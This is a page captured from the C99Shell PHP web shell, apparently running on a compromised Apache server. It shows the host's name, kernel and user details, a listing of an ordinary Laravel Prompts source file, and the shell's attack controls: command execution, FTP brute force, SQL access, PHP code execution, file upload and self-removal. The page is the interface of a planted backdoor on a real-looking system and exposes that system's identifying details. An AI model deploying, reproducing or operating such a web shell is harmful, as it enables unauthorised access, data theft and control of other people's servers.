!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/portfolio.picotech.app/public_html/vendor/laravel/prompts/src/Themes/Default/   drwxr-xr-x
Free 28.59 GB of 117.98 GB (24.23%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     SelectPromptRenderer.php (3.16 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Laravel\Prompts\Themes\Default;

use 
Laravel\Prompts\SelectPrompt;
use 
Laravel\Prompts\Themes\Contracts\Scrolling;

class 
SelectPromptRenderer extends Renderer implements Scrolling
{
    use 
Concerns\DrawsBoxes;
    use 
Concerns\DrawsScrollbars;

    
/**
     * Render the select prompt.
     */
    
public function __invoke(SelectPrompt $prompt): string
    
{
        
$maxWidth $prompt->terminal()->cols() - 6;

        return match (
$prompt->state) {
            
'submit' => $this
                
->box(
                    
$this->dim($this->truncate($prompt->label$prompt->terminal()->cols() - 6)),
                    
$this->truncate($prompt->label(), $maxWidth),
                ),

            
'cancel' => $this
                
->box(
                    
$this->truncate($prompt->label$prompt->terminal()->cols() - 6),
                    
$this->renderOptions($prompt),
                    
color'red',
                )
                ->
error($prompt->cancelMessage),

            
'error' => $this
                
->box(
                    
$this->truncate($prompt->label$prompt->terminal()->cols() - 6),
                    
$this->renderOptions($prompt),
                    
color'yellow',
                )
                ->
warning($this->truncate($prompt->error$prompt->terminal()->cols() - 5)),

            default => 
$this
                
->box(
                    
$this->cyan($this->truncate($prompt->label$prompt->terminal()->cols() - 6)),
                    
$this->renderOptions($prompt),
                )
                ->
when(
                    
$prompt->hint,
                    fn () => 
$this->hint($prompt->hint),
                    fn () => 
$this->newLine() // Space for errors
                
),
        };
    }

    
/**
     * Render the options.
     */
    
protected function renderOptions(SelectPrompt $prompt): string
    
{
        return 
$this->scrollbar(
            
collect($prompt->visible())
                ->
map(fn ($label) => $this->truncate($label$prompt->terminal()->cols() - 12))
                ->
map(function ($label$key) use ($prompt) {
                    
$index array_search($keyarray_keys($prompt->options));

                    if (
$prompt->state === 'cancel') {
                        return 
$this->dim($prompt->highlighted === $index
                            
"› ● {$this->strikethrough($label)}  "
                            
"  ○ {$this->strikethrough($label)}  "
                        
);
                    }

                    return 
$prompt->highlighted === $index
                        
"{$this->cyan('›')} {$this->cyan('●')} {$label}  "
                        
"  {$this->dim('○')} {$this->dim($label)}  ";
                })
                ->
values(),
            
$prompt->firstVisible,
            
$prompt->scroll,
            
count($prompt->options),
            
min($this->longest($prompt->optionspadding6), $prompt->terminal()->cols() - 6),
            
$prompt->state === 'cancel' 'dim' 'cyan'
        
)->implode(PHP_EOL);
    }

    
/**
     * The number of lines to reserve outside of the scrollable area.
     */
    
public function reservedLines(): int
    
{
        return 
5;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--